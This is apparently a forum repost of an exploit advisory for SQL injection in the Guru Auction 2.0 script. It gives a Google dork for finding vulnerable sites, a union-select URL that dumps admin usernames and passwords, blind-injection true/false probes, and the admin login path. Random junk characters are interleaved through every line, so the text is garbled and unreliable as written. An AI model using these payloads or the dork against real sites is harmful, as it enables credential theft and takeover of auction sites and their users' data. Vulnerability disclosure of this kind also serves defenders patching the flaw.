Guru Auction 2.0 Multiple SQL Injection Vulnerabilities
' L/ W, e( T. ^. H( F7 T! f/ o. {' v! w% P* k" u' t% f; [8 l
作者 : v3n0m
0 \" d, h* x2 }应用 : Guru Auction 2.0+ C3 g$ R) ~4 v5 r, ^1 R4 a
Price : $49
- d" _, i% {; WVendor : http://www.guruscript.com/0 l+ m; r' n# y* v) D5 ]9 l' x, n
Google Dork : inurl:subcat.php?cate_id=2 E0 B0 i: F5 t
4 H# h* s+ h" u0 Y @# I% jSQLi p0c:
3 n3 Y/ L( H5 a, R2 v~~~~~~~~~~
7 S. B1 u9 F7 z" C, Mhttp://domain.tld/[path]/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--! q7 I/ O7 M+ e2 F- P
; G0 e. q- Z [0 @2 p+ |# t
5 i V; F' D9 j1 z4 W$ T* U
盲注 p0c:
% C& l4 \! Y7 t1 R~~~~~~~~~~
( Y% ^5 m2 |* C# ]8 s; B4 l5 Hhttp://www.political-security.com /[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 << true$ z, ^) T& C6 t/ M0 L. w6 [8 h& B% o
http://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 << false
" w; @# G5 m2 X5 g8 J * `7 d! i$ m$ z5 g
管理登录入口:
" E) E+ ?6 m& I~~~~~~~~~~
% R% F3 O8 P: `5 Ohttp://domain.tld/[path]/admin/
$ y( [" T: c- D6 F |
发表于 2012-12-31 09:24:05
收藏
分享
支持
反对